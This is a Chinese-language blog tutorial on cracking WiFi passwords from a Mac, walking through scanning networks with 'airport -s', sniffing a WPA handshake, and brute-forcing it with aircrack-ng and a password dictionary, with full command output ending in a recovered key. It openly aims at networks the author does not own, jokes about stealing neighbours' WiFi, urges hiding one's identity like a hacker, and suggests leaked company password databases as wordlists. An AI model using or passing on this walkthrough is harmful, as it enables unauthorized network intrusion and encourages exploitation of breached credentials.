刚入手 Mac 没多久,但基于 FreeBCD 的 Mac 系统兼容 Unix 命令加上 brew 工具的加持也兼容绝大部分的 linux 命令。好用的用户交互 + 对码农超友好的 Terminal,很完美!所以就爱不释手了,经常随包携带到处码代码(也就码农的命吧)。这么一得瑟就出问题了,外出无网啊,这不,发现个工具居然很轻松的就得到了大部分的 WiFi 密码(可能会不道德啊,建议大家对公共 WiFi 使用,对邻居家偷网的后果自负)
闲话少说,言归正传!
保护好自己
进入暗网的第一课就是:“藏好了,不要暴露自己”,有点「黑暗森林」的意思。这适用于网络中的法外之徒——黑客,所以在网络中想干点暗黑事,必须学会隐藏真身,用分身、傀儡去干活,还要学会为他们擦屁股,毕竟养一个分身或傀儡也不容易,丢了坏可惜的。
网络世界中 Mac 地址(网卡号)相当于你现实中的身份证,ip 地址相当于手机号。做攻防的时候这两个东东必须要隐藏好,不能被发现。隐藏的方法有很多,常见的有……(扯多了,咱也不干啥违法的事)。
话说最简单的方式是用虚拟机,虚拟机跟炼制分身一样,起不到保护身份的目的,但别人攻击你的时候,额,最坏的情况也就是把分身干躺,死一个分身而已可以接受的。
炼制分身的法器有 Virtual Box, VMWare,Hyper-V 等,在各自系统上安装法器,找到分身镜像(Ubuntu, Kali, Arch, bulabula)即可炼制,我喜欢小的,mini 的,老子就想用几个命令而已装个 Ubuntu 干鸟啊,所以我喜欢装 alpine,小巧,嗖的一下就完事(关键硬盘小啊,128G,😭)
扫描 scan
首先要知道想破解哪个 WiFi,要获得这个 WiFi 的一些信息才能精准的嗅探到需要破解时用到的数据。
MAC 系统有个很好用的 WiFi(802.11) 接口工具:airport,使用 airport -s
即可扫描所有可见的无线网络:
$ airport -s
SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
xxxxxx_xxxxxxxx xx:xx:xx:xx:xx:xx -36 5 Y CN WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
xxx xx:xx:xx:xx:xx:xx -51 1 Y CN WPA2(802.1x/AES/AES)
shuiwo xx:xx:xx:xx:xx:xx -57 1 Y CN WPA2(PSK/AES/AES)
SSID: WiFi 名称 BSSID: 站点 MAC 地址 RSSI: 信号轻度,绝对值越小越强 CHANNEL: 信道 SECURITY: 加密方式
嗅探 sniff
使用 airport sniff [CHANNEL]
即可对 WiFi 信道抓包,之后会生成 .cap 文件,再之后可用 aircrack.ng 等工具进行暴力破解。
$ sudo airport sniff 1
嗅探时间看情况而定,最好嗅探的时候有人连接过目标 WiFi。
生成了 airportSniffXXXXXXX.cap 文件
密码字典
密码字典是加速暴力破解密码时的不二法门,去哪搞到好的密码字典,github 上搜去吧(另外之前某些大公司泄的漏数据库里面可是有海量的明文密码的)。这个项目,里面的字典大大地好用!
这里用的字典文件是:pwddct.txt
破解工具登场
有许多好的工具都可用来暴力破解,牛逼一点的人会自己写不用别人写的,尤其有网络通信的工具。
这里我们用 aircrack-ng,用法如下aircrack-ng -w pwddct.txt airportSniffXXXXXXX.cap·文件
,该命令首先会解析通讯包,然后从其中找出有握手的包的序号给它让它用字典暴力破解就行了。
$ aircrack-ng -w pwddct.txt airportSniffXXXXXXX.cap
Reading packets, please wait...
Opening airportSniffwghS1w.cap
[0KRead 187668 packets.
# BSSID ESSID Encryption
1033 xx:xx:xx:xx:xx:xx WPA (0 handshake)
1034 xx:xx:xx:xx:xx:xx WEP (3 IVs)
1035 xx:xx:xx:xx:xx:xx WPA (0 handshake)
1036 xx:xx:xx:xx:xx:xx shuiwo WPA (1 handshake)
1037 xx:xx:xx:xx:xx:xx xxxx xxxxxx WPA (0 handshake)
1038 xx:xx:xx:xx:xx:xx xxxxxxxxx-xxxx Unknown
1039 xx:xx:xx:xx:xx:xx WPA (0 handshake)
1040 xx:xx:xx:xx:xx:xx xx??x%??x!?!x??Sxx?x?'x Unknown
1041 xx:xx:xx:xx:xx:xx shuiwo WEP (1 IVs)
Index number of target network ? 1036
Aircrack-ng 1.6
[00:00:21] 96329/96807 keys tested (4490.17 k/s)
Time left: 0 seconds 99.51%
KEY FOUND! [ 12345678 ]
Master Key : xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
Transient Key : xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
EAPOL HMAC : xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
还好,密码简单很快就破解了!
TODO:
- Linux 的扫描和嗅探有时间再补吧